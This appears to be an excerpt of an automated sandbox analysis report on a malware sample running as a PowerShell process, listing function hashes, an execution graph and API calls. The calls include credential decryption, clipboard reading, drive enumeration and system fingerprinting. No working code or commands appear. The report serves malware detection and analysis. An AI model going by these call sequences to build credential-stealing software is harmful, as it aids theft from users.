                                                                        • Opcode ID: d32e805eb94800258616c228abefcb15b6e348d0f2c7c24859bef3a7f0baf761
                                                                        • Instruction ID: f548746a444665839882d368df1e1866f5a956a2f44969b703b5b5e23e052c38
                                                                        • Opcode Fuzzy Hash: d32e805eb94800258616c228abefcb15b6e348d0f2c7c24859bef3a7f0baf761
                                                                        • Instruction Fuzzy Hash: D05128B170534B9FEB188A64C844B2ABBA6EFC5710F24C07AE64D9B381DB72CD41C751
                                                                        Function 073935D8 Relevance: 5.4, Strings: 4, Instructions: 383COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3297291785.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7390000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4i$4i$Xbi$Xbi
                                                                        • API String ID: 0-2864769407
                                                                        • Opcode ID: ea475289485ffdcfec6ba06b96bd2bba1a8f3f55237a163e455df1bc4dd537d8
                                                                        • Instruction ID: a54cd5574f19628b01a25a6ea1dd9f3725e116458ee56b3e29fee35009ed651e
                                                                        • Opcode Fuzzy Hash: ea475289485ffdcfec6ba06b96bd2bba1a8f3f55237a163e455df1bc4dd537d8
                                                                        • Instruction Fuzzy Hash: 08D105F1B0420ADFFF148E69D8457AABBA6EFC6310F14807AE5498B681DB71CC51C7A1
                                                                        Function 07393E80 Relevance: 5.3, Strings: 4, Instructions: 317COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3297291785.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7390000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 84i$84i$</$</
                                                                        • API String ID: 0-236260905
                                                                        • Opcode ID: 99422eb8347af253c13fcc62c7671168cabec7473b09caa10f1eea9942f9cb4b
                                                                        • Instruction ID: 828a5a5f68a9deb0728cd19165ac6563a77fbe84ca4dc041156fe5d28619b116
                                                                        • Opcode Fuzzy Hash: 99422eb8347af253c13fcc62c7671168cabec7473b09caa10f1eea9942f9cb4b
                                                                        • Instruction Fuzzy Hash: C1A147F2B00256DFEF259A68D81066BFBA5AFC5210F24807BD549CB341EB71CC42C7A2

                                                                        Execution Graph

                                                                        Execution Coverage:8.4%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:25.7%
                                                                        Total number of Nodes:292
                                                                        Total number of Limit Nodes:10
                                                                        execution_graph 13166 43c583 CoInitializeSecurity 13306 46cce6 13307 46cd00 13306->13307 13309 46cd6e 13307->13309 13313 46c1f0 LdrInitializeThunk 13307->13313 13312 46c1f0 LdrInitializeThunk 13309->13312 13311 46ce4d 13312->13311 13313->13309 13314 46c767 13316 46c790 13314->13316 13315 46c80e 13316->13315 13318 46c1f0 LdrInitializeThunk 13316->13318 13318->13315 13167 466145 13171 46dbf0 13167->13171 13169 46615d GetUserDefaultUILanguage 13170 466188 13169->13170 13319 45d7e3 13320 45d7ee 13319->13320 13323 467c10 13320->13323 13324 467c30 13323->13324 13326 467cae 13324->13326 13332 46c1f0 LdrInitializeThunk 13324->13332 13327 45d7fc 13326->13327 13329 467d2e 13326->13329 13331 46c1f0 LdrInitializeThunk 13326->13331 13329->13327 13333 46c1f0 LdrInitializeThunk 13329->13333 13331->13329 13332->13326 13333->13327 13172 45c84d 13173 45c880 13172->13173 13174 45c97e 13173->13174 13176 46c1f0 LdrInitializeThunk 13173->13176 13176->13174 13177 46c58a 13179 46c460 13177->13179 13178 46c5f4 13179->13178 13182 46c1f0 LdrInitializeThunk 13179->13182 13181 46c54d 13182->13181 13183 43d38e 13184 43d3b0 13183->13184 13187 467df0 13184->13187 13186 43d4e2 13186->13186 13188 467e10 CoCreateInstance 13187->13188 13190 468042 SysAllocString 13188->13190 13191 468440 13188->13191 13194 4680e7 13190->13194 13193 468450 GetVolumeInformationW 13191->13193 13195 468471 13193->13195 13196 46842f SysFreeString 13194->13196 13197 4680ef CoSetProxyBlanket 13194->13197 13195->13186 13196->13191 13198 468425 13197->13198 13199 46810f SysAllocString 13197->13199 13198->13196 13201 468200 13199->13201 13201->13201 13202 468237 SysAllocString 13201->13202 13204 46825b 13202->13204 13203 468413 SysFreeString SysFreeString 13203->13198 13204->13203 13205 468409 SysFreeString 13204->13205 13206 4682a3 VariantInit 13204->13206 13205->13203 13208 4682f0 13206->13208 13207 4683f8 VariantClear 13207->13205 13208->13207 13209 46c2c8 13210 46c2e0 13209->13210 13210->13210 13211 46ccaf GetForegroundWindow 13210->13211 13212 46ccbe 13211->13212 13334 4517ab 13335 4517d0 13334->13335 13336 4518a0 2 API calls 13335->13336 13337 45180b 13336->13337 13338 4518a0 2 API calls 13337->13338 13339 45182a 13338->13339 13340 460469 CoSetProxyBlanket 13213 438850 13215 43885f 13213->13215 13214 438acf ExitProcess 13215->13214 13216 438ab8 13215->13216 13217 43891c GetCurrentProcessId GetCurrentThreadId 13215->13217 13226 46c160 13216->13226 13218 438941 13217->13218 13219 438945 SHGetSpecialFolderPathW GetForegroundWindow 13217->13219 13218->13219 13221 438a3d 13219->13221 13221->13216 13225 43c550 CoInitializeEx 13221->13225 13229 46d7f0 13226->13229 13228 46c165 FreeLibrary 13228->13214 13230 46d7f9 13229->13230 13230->13228 13231 461715 13232 46174d SysAllocString 13231->13232 13234 461903 13232->13234 13341 465972 13344 46599b 13341->13344 13342 4659c4 13344->13342 13345 46c1f0 LdrInitializeThunk 13344->13345 13345->13344 13346 4514b0 13347 451510 13346->13347 13348 4514be 13346->13348 13350 4515d0 13348->13350 13351 4515e0 13350->13351 13351->13351 13354 46e510 13351->13354 13353 4516df 13356 46e530 13354->13356 13355 46e68e 13355->13353 13356->13355 13358 46c1f0 LdrInitializeThunk 13356->13358 13358->13355 13235 46aad0 13236 46aaf0 13235->13236 13238 46ab2e 13236->13238 13243 46c1f0 LdrInitializeThunk 13236->13243 13238->13238 13240 46ac0e 13238->13240 13241 46ace1 13238->13241 13244 46c1f0 LdrInitializeThunk 13238->13244 13240->13240 13245 46aaa0 13240->13245 13243->13238 13244->13240 13246 46aac4 13245->13246 13247 46aab3 13245->13247 13246->13241 13248 46aab8 RtlFreeHeap 13247->13248 13248->13246 13249 451853 13250 451860 13249->13250 13250->13250 13253 4518a0 13250->13253 13254 4518b7 13253->13254 13266 46e340 13254->13266 13256 451880 13258 46aaa0 RtlFreeHeap 13261 452007 13258->13261 13259 45191d 13259->13256 13260 4519fc 13259->13260 13270 46c1f0 LdrInitializeThunk 13259->13270 13263 451ff5 13260->13263 13265 46aaa0 RtlFreeHeap 13260->13265 13271 46c1f0 LdrInitializeThunk 13260->13271 13261->13256 13272 46c1f0 LdrInitializeThunk 13261->13272 13263->13258 13265->13260 13268 46e360 13266->13268 13267 46e4be 13267->13259 13268->13267 13273 46c1f0 LdrInitializeThunk 13268->13273 13270->13259 13271->13260 13272->13261 13273->13267 13359 43d835 13361 43d71d 13359->13361 13360 43d8e2 13361->13359 13361->13360 13363 46c1f0 LdrInitializeThunk 13361->13363 13363->13361 13364 43c679 13365 43c690 13364->13365 13366 43c6de 13365->13366 13456 46c1f0 LdrInitializeThunk 13365->13456 13368 43c75e 13366->13368 13457 46c1f0 LdrInitializeThunk 13366->13457 13384 453860 13368->13384 13371 43c7cd 13393 453f20 13371->13393 13373 43c7ed 13409 4541c0 13373->13409 13375 43c80d 13427 455e30 13375->13427 13381 43c83f 13458 4629c0 13381->13458 13391 4538b0 13384->13391 13385 4518a0 2 API calls 13387 4539b4 13385->13387 13386 453c61 GetLogicalDrives 13390 46e510 LdrInitializeThunk 13386->13390 13387->13371 13388 453ac1 13388->13386 13388->13387 13388->13388 13392 453c77 13388->13392 13389 46e510 LdrInitializeThunk 13389->13388 13390->13392 13391->13387 13391->13388 13391->13389 13391->13391 13391->13392 13392->13385 13392->13387 13399 453fb0 13393->13399 13394 454198 13394->13373 13396 4540af 13470 44f7a0 13396->13470 13397 45439c 13482 46eca0 13397->13482 13399->13394 13399->13396 13399->13397 13474 46efb0 13399->13474 13403 454404 13403->13403 13404 454ffa 13403->13404 13405 46eb60 LdrInitializeThunk 13403->13405 13406 454f30 13403->13406 13494 46f330 13403->13494 13405->13403 13502 46c1f0 LdrInitializeThunk 13406->13502 13410 4541d0 13409->13410 13411 46eb60 LdrInitializeThunk 13410->13411 13414 454078 13411->13414 13412 46efb0 2 API calls 13412->13414 13413 454198 13413->13375 13414->13412 13414->13413 13415 45439c 13414->13415 13416 4540af 13414->13416 13417 46eca0 2 API calls 13415->13417 13418 44f7a0 2 API calls 13416->13418 13419 4543cb 13417->13419 13418->13413 13420 46eb60 LdrInitializeThunk 13419->13420 13421 454404 13419->13421 13420->13421 13421->13421 13422 454ffa 13421->13422 13423 46eb60 LdrInitializeThunk 13421->13423 13424 454f30 13421->13424 13425 46f330 2 API calls 13421->13425 13423->13421 13510 46c1f0 LdrInitializeThunk 13424->13510 13425->13421 13433 455e5c 13427->13433 13428 46efb0 2 API calls 13428->13433 13430 43c82d 13436 4566d0 13430->13436 13431 46eb60 LdrInitializeThunk 13431->13433 13433->13428 13433->13430 13433->13431 13434 46eca0 2 API calls 13433->13434 13435 46c1f0 LdrInitializeThunk 13433->13435 13511 46c180 13433->13511 13521 46f720 13433->13521 13434->13433 13435->13433 13437 4566f0 13436->13437 13440 45674e 13437->13440 13531 46c1f0 LdrInitializeThunk 13437->13531 13438 43c836 13444 456b50 13438->13444 13440->13438 13443 45683e 13440->13443 13532 46c1f0 LdrInitializeThunk 13440->13532 13441 46aaa0 RtlFreeHeap 13441->13438 13443->13441 13446 456b59 13444->13446 13445 456b64 13445->13381 13446->13445 13533 468c50 13446->13533 13448 4573e2 13448->13381 13449 46e6e0 LdrInitializeThunk 13453 4573b8 13449->13453 13450 46e340 LdrInitializeThunk 13450->13453 13451 4575c2 CopyFileW 13451->13453 13452 46e7d0 LdrInitializeThunk 13452->13453 13453->13448 13453->13449 13453->13450 13453->13451 13453->13452 13454 457795 13453->13454 13540 46c1f0 LdrInitializeThunk 13454->13540 13456->13366 13457->13368 13542 444400 13458->13542 13460 4629ce OpenClipboard 13461 4629f0 13460->13461 13462 43c891 13461->13462 13463 4629fb GetClipboardData 13461->13463 13464 462a16 GlobalLock 13463->13464 13465 462b73 CloseClipboard 13463->13465 13467 462a35 13464->13467 13465->13462 13466 462b62 GlobalUnlock 13466->13465 13468 462a73 GetWindowLongW 13467->13468 13469 462a45 13467->13469 13468->13469 13469->13466 13471 44f7d0 13470->13471 13471->13471 13472 4518a0 2 API calls 13471->13472 13473 44f7f9 13472->13473 13473->13394 13475 46efd0 13474->13475 13478 46f04e 13475->13478 13503 46c1f0 LdrInitializeThunk 13475->13503 13476 46f31c 13476->13399 13478->13476 13481 46f17e 13478->13481 13504 46c1f0 LdrInitializeThunk 13478->13504 13479 46aaa0 RtlFreeHeap 13479->13476 13481->13479 13481->13481 13483 46ecc0 13482->13483 13486 46ed3e 13483->13486 13505 46c1f0 LdrInitializeThunk 13483->13505 13484 4543cb 13484->13403 13490 46eb60 13484->13490 13486->13484 13489 46ee6e 13486->13489 13506 46c1f0 LdrInitializeThunk 13486->13506 13487 46aaa0 RtlFreeHeap 13487->13484 13489->13487 13491 46eb80 13490->13491 13491->13491 13492 46ec6e 13491->13492 13507 46c1f0 LdrInitializeThunk 13491->13507 13492->13403 13495 46f360 13494->13495 13498 46f3de 13495->13498 13508 46c1f0 LdrInitializeThunk 13495->13508 13496 46f712 13496->13403 13498->13496 13501 46f50e 13498->13501 13509 46c1f0 LdrInitializeThunk 13498->13509 13499 46aaa0 RtlFreeHeap 13499->13496 13501->13499 13501->13501 13502->13394 13503->13478 13504->13481 13505->13486 13506->13489 13507->13492 13508->13498 13509->13501 13510->13413 13512 46c1a6 13511->13512 13513 46c1d0 13511->13513 13514 46c198 13511->13514 13515 46c1d6 13511->13515 13518 46c1ba 13511->13518 13520 46c1ab RtlReAllocateHeap 13512->13520 13516 46aaa0 RtlFreeHeap 13513->13516 13514->13512 13514->13513 13514->13515 13514->13518 13517 46aaa0 RtlFreeHeap 13515->13517 13516->13515 13519 46c1df 13517->13519 13518->13433 13520->13518 13522 46f731 13521->13522 13525 46f8ae 13522->13525 13529 46c1f0 LdrInitializeThunk 13522->13529 13523 46fb29 13523->13433 13525->13523 13527 46fa29 13525->13527 13530 46c1f0 LdrInitializeThunk 13525->13530 13526 46aaa0 RtlFreeHeap 13526->13523 13527->13526 13529->13525 13530->13527 13531->13440 13532->13443 13538 468c80 13533->13538 13534 46eb60 LdrInitializeThunk 13534->13538 13535 46efb0 2 API calls 13535->13538 13536 468db8 13536->13453 13537 46f720 2 API calls 13537->13538 13538->13534 13538->13535 13538->13536 13538->13537 13541 46c1f0 LdrInitializeThunk 13538->13541 13540->13448 13541->13538 13542->13460 13275 445799 13276 44579e 13275->13276 13285 46e6e0 13276->13285 13278 4457b7 13281 4457f8 13278->13281 13289 46e7d0 13278->13289 13280 4458fe 13283 445bc6 13280->13283 13284 445b95 CryptUnprotectData 13280->13284 13281->13280 13295 46c1f0 LdrInitializeThunk 13281->13295 13283->13283 13284->13283 13286 46e700 13285->13286 13286->13286 13287 46e77e 13286->13287 13296 46c1f0 LdrInitializeThunk 13286->13296 13287->13278 13290 46e800 13289->13290 13293 46e87f 13290->13293 13297 46c1f0 LdrInitializeThunk 13290->13297 13291 46e94e 13291->13281 13293->13291 13298 46c1f0 LdrInitializeThunk 13293->13298 13295->13280 13296->13287 13297->13293 13298->13291 13299 460758 SysAllocString 13300 46089c 13299->13300

                                                                        Executed Functions

                                                                        Function 00467DF0 Relevance: 30.4, APIs: 12, Strings: 5, Instructions: 640memorycomCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 9 467df0-467e0f 10 467e10-467e24 9->10 10->10 11 467e26-467e34 10->11 12 467e40-467e54 11->12 12->12 13 467e56-467e97 12->13 14 467ea0-467ec5 13->14 14->14 15 467ec7-467ede 14->15 17 467ee4-467eef 15->17 18 467f92-467f9f 15->18 20 467ef0-467f22 17->20 19 467fa0-467fe0 18->19 19->19 22 467fe2-46803c CoCreateInstance 19->22 20->20 21 467f24-467f37 20->21 23 467f40-467f82 21->23 24 468042-46807b 22->24 25 468440-46846f call 46dbf0 GetVolumeInformationW 22->25 23->23 26 467f84-467f8e 23->26 27 468080-4680bc 24->27 31 468471-468475 25->31 32 468479-46847b 25->32 26->18 27->27 29 4680be-4680e9 SysAllocString 27->29 37 46842f-46843c SysFreeString 29->37 38 4680ef-468109 CoSetProxyBlanket 29->38 31->32 33 46848d-468494 32->33 35 468496-46849d 33->35 36 4684a0-4684b6 33->36 35->36 39 4684c0-4684f0 36->39 37->25 40 468425-46842b 38->40 41 46810f-468121 38->41 39->39 42 4684f2-46852b 39->42 40->37 43 468130-468177 41->43 44 468530-468573 42->44 43->43 45 468179-4681f2 SysAllocString 43->45 44->44 46 468575-4685a5 call 44e5c0 44->46 47 468200-468235 45->47 52 4685b0-4685b8 46->52 47->47 48 468237-468261 SysAllocString 47->48 53 468267-468289 48->53 54 468413-468423 SysFreeString * 2 48->54 52->52 55 4685ba-4685bc 52->55 62 46828f-468292 53->62 63 468409-468410 SysFreeString 53->63 54->40 56 4685c2-4685d2 call 4381b0 55->56 57 468480-468487 55->57 56->57 57->33 58 4685d7-4685de 57->58 62->63 64 468298-46829d 62->64 63->54 64->63 65 4682a3-4682ef VariantInit 64->65 66 4682f0-468319 65->66 66->66 67 46831b-468333 66->67 69 4683f8-468405 VariantClear 67->69 70 468339-46833f 67->70 69->63 70->69 71 468345-468353 70->71 72 468355-46835a 71->72 73 46838d 71->73 74 46836c-468370 72->74 75 46838f-4683b7 call 438020 call 438d50 73->75 76 468372-46837b 74->76 77 468360 74->77 86 4683be-4683ca 75->86 87 4683b9 75->87 80 468382-468386 76->80 81 46837d-468380 76->81 79 468361-46836a 77->79 79->74 79->75 80->79 83 468388-46838b 80->83 81->79 83->79 88 4683d1-4683f4 call 438050 call 438030 86->88 89 4683cc 86->89 87->86 88->69 89->88
                                                                        APIs
                                                                        • CoCreateInstance.OLE32(0047168C,00000000,00000001,0047167C,00000000), ref: 00468034
                                                                        • SysAllocString.OLEAUT32()\"^), ref: 004680C3
                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00468101
                                                                        • SysAllocString.OLEAUT32()\"^), ref: 0046817E
                                                                        • SysAllocString.OLEAUT32()\"^), ref: 00468238
                                                                        • VariantInit.OLEAUT32(C7C6C5CC), ref: 004682A8
                                                                        • VariantClear.OLEAUT32(?), ref: 004683F9
                                                                        • SysFreeString.OLEAUT32(?), ref: 00468410
                                                                        • SysFreeString.OLEAUT32(?), ref: 0046841D
                                                                        • SysFreeString.OLEAUT32(?), ref: 00468423
                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00468430
                                                                        • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,66966446,00000000,00000000,00000000,00000000), ref: 00468468
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3465832704.0000000000431000.00000020.00000400.00020000.00000000.sdmp, Offset: 00430000, based on PE: true
                                                                        • Associated: 00000008.00000002.3465773346.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467599300.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467854398.0000000000482000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_430000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: String$Free$Alloc$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                        • String ID: P%R$)\"^$.H4J$O@$pq
                                                                        • API String ID: 1341229144-1397720406
                                                                        • Opcode ID: ee7eb0f103fbee13b51a9d80a0c7fa93ab1ec2baccb10836be8eb141957ba745
                                                                        • Instruction ID: 5fbdcaf0498465040d067efa2e48bb84a80da7acb7bedbb3d30a540980822281
                                                                        • Opcode Fuzzy Hash: ee7eb0f103fbee13b51a9d80a0c7fa93ab1ec2baccb10836be8eb141957ba745
                                                                        • Instruction Fuzzy Hash: 7C22FF72A483408BD314CF29C880B5BBBE5FFC5704F148A2DE5959B381EB79D909CB96
                                                                        Function 00453860 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 501COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 100 453860-4538af 101 4538b0-4538ed 100->101 101->101 102 4538ef-453936 101->102 104 453940-453968 102->104 104->104 105 45396a-453975 104->105 106 4539c5-4539d1 105->106 107 453cb5-453d5b 105->107 108 4539b4 105->108 109 453ae4-453af0 105->109 110 453ad4-453adb 105->110 111 4539d2-4539da 105->111 112 45397c-453981 105->112 113 4539bc-4539c2 call 438030 105->113 114 453c88-453c92 105->114 115 453c9a 105->115 123 453d60-453da9 107->123 108->113 119 453af2-453af7 109->119 120 453af9 109->120 110->109 117 4539e3 111->117 118 4539dc-4539e1 111->118 121 453983-453988 112->121 122 45398a 112->122 113->106 114->115 126 4539ea-453a22 call 438020 117->126 118->126 127 453b00-453ba8 call 438020 119->127 120->127 128 45398d-4539ad call 438020 121->128 122->128 123->123 124 453dab-453dba call 4518a0 123->124 133 453dbf-453dc2 124->133 137 453a30-453a5e 126->137 138 453bb0-453bff 127->138 128->106 128->107 128->108 128->109 128->110 128->111 128->113 128->114 128->115 139 453dca-453def 133->139 137->137 140 453a60-453a68 137->140 138->138 141 453c01-453c0d 138->141 143 453df0-453e0c 139->143 144 453a81-453a8e 140->144 145 453a6a-453a6f 140->145 146 453c31-453c3e 141->146 147 453c0f-453c16 141->147 143->143 150 453e0e-453e91 143->150 152 453ab1-453abc call 46e510 144->152 153 453a90-453a94 144->153 151 453a70-453a7f 145->151 148 453c61-453c81 GetLogicalDrives call 46e510 146->148 149 453c40-453c44 146->149 154 453c20-453c2f 147->154 148->106 148->113 148->114 148->115 148->139 163 453ca0-453ca6 call 438030 148->163 164 453f05-453f0e call 438030 148->164 165 453eff 148->165 166 453caf 148->166 155 453c50-453c5f 149->155 158 453ea0-453ece 150->158 151->144 151->151 160 453ac1-453acd 152->160 159 453aa0-453aaf 153->159 154->146 154->154 155->148 155->155 158->158 162 453ed0-453ef5 call 451740 158->162 159->152 159->159 160->107 160->109 160->110 160->114 160->115 160->139 160->163 162->165 163->166 165->164 166->107
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3465832704.0000000000431000.00000020.00000400.00020000.00000000.sdmp, Offset: 00430000, based on PE: true
                                                                        • Associated: 00000008.00000002.3465773346.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467599300.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467854398.0000000000482000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_430000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: /G$I$7N1@$A[$Fg)i$OU$WE${\}
                                                                        • API String ID: 0-1763234448
                                                                        • Opcode ID: 3bc7412ca2e3d408659685e31d0a56682b9dc7cb60adfd7e8800fc183c0d8fa8
                                                                        • Instruction ID: 84ede7667e8707ec968b716167b6ea6fbac9d8deaa182fa7fa1c9d00773e7a56
                                                                        • Opcode Fuzzy Hash: 3bc7412ca2e3d408659685e31d0a56682b9dc7cb60adfd7e8800fc183c0d8fa8
                                                                        • Instruction Fuzzy Hash: B1F1CBB56083409FD3148F65D89166BBBF1FBC6356F04892DF4C98B351E7B8890ACB86
                                                                        Function 00445799 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 492encryptionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 173 445799-4457cc call 438030 call 46e6e0 178 445807 173->178 179 445850 173->179 180 445852-445869 173->180 181 445842-445847 173->181 182 4457d3-445800 call 438020 call 46e7d0 173->182 183 445818-44582c call 431000 173->183 184 445839-44583f call 438030 173->184 178->183 179->180 187 445870-4458cb 180->187 181->179 182->178 182->179 182->180 182->181 182->183 182->184 183->184 184->181 187->187 191 4458cd-4458d5 187->191 194 4458d7-4458e6 191->194 195 44591a-44597b call 431a90 191->195 198 4458f0-4458f7 194->198 202 445980-4459b4 195->202 200 445900-445906 198->200 201 4458f9-4458fc 198->201 200->195 204 445908-445917 call 46c1f0 200->204 201->198 203 4458fe 201->203 202->202 205 4459b6-4459d3 call 431dd0 202->205 203->195 204->195 210 445bc6-445bcb 205->210 211 445d46-445d5f call 46dbf0 205->211 212 445d66 205->212 213 445d60 205->213 214 445d6c-445d78 call 438030 205->214 215 445d3d-445d43 call 438030 205->215 216 445d7a-445ddf 205->216 217 4459da-4459df 205->217 219 445bd0-445bd9 210->219 211->213 214->216 215->211 220 445de0-445dfa 216->220 221 4459e0-4459e6 217->221 219->219 225 445bdb-445be2 219->225 220->220 226 445dfc-445e16 call 431dd0 220->226 221->221 227 4459e8-445a07 221->227 230 445be4-445be9 225->230 231 445c06 225->231 226->210 226->211 226->212 226->213 226->214 226->215 226->216 233 445a0e 227->233 234 445a09-445a0c 227->234 236 445c09-445c4b call 438020 230->236 231->236 238 445a0f-445a28 233->238 234->233 234->238 245 445c50-445cb6 236->245 240 445a2f 238->240 241 445a2a-445a2d 238->241 243 445a30-445a4e call 438020 240->243 241->240 241->243 250 445a54-445a5b 243->250 251 445b59-445bbf call 46dbf0 CryptUnprotectData 243->251 245->245 247 445cb8-445cc7 245->247 248 445ce1-445cf8 247->248 249 445cc9-445ccf 247->249 253 445d21-445d37 call 438cb0 248->253 254 445cfa-445d01 248->254 252 445cd0-445cdf 249->252 255 445a80-445aca call 44dae0 * 2 250->255 251->210 251->211 251->212 251->213 251->214 251->215 251->216 252->248 252->252 253->215 257 445d10-445d1f 254->257 265 445a70-445a7a 255->265 266 445acc-445ae7 call 44dae0 255->266 257->253 257->257 265->251 265->255 266->265 269 445ae9-445b11 266->269 270 445b17-445b2d call 44dae0 269->270 271 445a61-445a65 269->271 274 445b33-445b54 270->274 275 445a5d 270->275 271->265 274->265 275->271
                                                                        APIs
                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00445BAF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3465832704.0000000000431000.00000020.00000400.00020000.00000000.sdmp, Offset: 00430000, based on PE: true
                                                                        • Associated: 00000008.00000002.3465773346.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467599300.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467854398.0000000000482000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_430000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: CryptDataUnprotect
                                                                        • String ID: 8MNO$<I2K$NDNK$RXD$X$oA&C$~
                                                                        • API String ID: 834300711-544630279
                                                                        • Opcode ID: 72d2021904b1f8f14703715d48e02ae81f848d227aeba1fb5ce8d9703ded3b74
                                                                        • Instruction ID: 3dde56abb024781d15f60e1531d3905ef70fb0a8538a0f76bb9358e867b7cdeb
                                                                        • Opcode Fuzzy Hash: 72d2021904b1f8f14703715d48e02ae81f848d227aeba1fb5ce8d9703ded3b74
                                                                        • Instruction Fuzzy Hash: C0F156B29087408FD724CF28D8817ABB7E1EFD5314F194A2DE4D997352EB389845CB86
                                                                        Function 00438850 Relevance: 7.7, APIs: 5, Instructions: 194threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 324 438850-438861 call 46bc60 327 438867-43888f call 438020 324->327 328 438acf-438ad1 ExitProcess 324->328 331 438890-4388cb 327->331 332 438904-438916 call 4654e0 331->332 333 4388cd-438902 331->333 336 438ab8-438abf 332->336 337 43891c-43893f GetCurrentProcessId GetCurrentThreadId 332->337 333->331 338 438ac1-438ac7 call 438030 336->338 339 438aca call 46c160 336->339 340 438941-438943 337->340 341 438945-438a3b SHGetSpecialFolderPathW GetForegroundWindow 337->341 338->339 339->328 340->341 344 438a6b-438aac call 439b00 341->344 345 438a3d-438a69 341->345 344->336 349 438aae call 43c550 344->349 345->344 351 438ab3 call 43b390 349->351 351->336
                                                                        APIs
                                                                        • GetCurrentProcessId.KERNEL32 ref: 0043891C
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00438925
                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004389DB
                                                                        • GetForegroundWindow.USER32 ref: 00438A33
                                                                          • Part of subcall function 0043C550: CoInitializeEx.COMBASE(00000000,00000002), ref: 0043C563
                                                                          • Part of subcall function 0043B390: FreeLibrary.KERNEL32(00438AB8), ref: 0043B396
                                                                          • Part of subcall function 0043B390: FreeLibrary.KERNEL32 ref: 0043B3B7
                                                                        • ExitProcess.KERNEL32 ref: 00438AD1
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3465832704.0000000000431000.00000020.00000400.00020000.00000000.sdmp, Offset: 00430000, based on PE: true
                                                                        • Associated: 00000008.00000002.3465773346.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467599300.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467854398.0000000000482000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_430000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                                        • String ID:
                                                                        • API String ID: 3072701918-0
                                                                        • Opcode ID: f0242fb4860acd1cd2dfcf3f92695afdd7727cf1a0324221132db839d98a140e
                                                                        • Instruction ID: 60f1640f7be7fdc311c8eb2baab2e906708437e5423aeb49ab95822fd574ca68
                                                                        • Opcode Fuzzy Hash: f0242fb4860acd1cd2dfcf3f92695afdd7727cf1a0324221132db839d98a140e
                                                                        • Instruction Fuzzy Hash: 04516AB7F102140BD71CAEAACC467A6B5878BC8710F1F913E6945DB3D6EDB89C0542C9
                                                                        Function 0046C1F0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LdrInitializeThunk.NTDLL(0046E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0046C21E
                                                                        Memory Dump Source
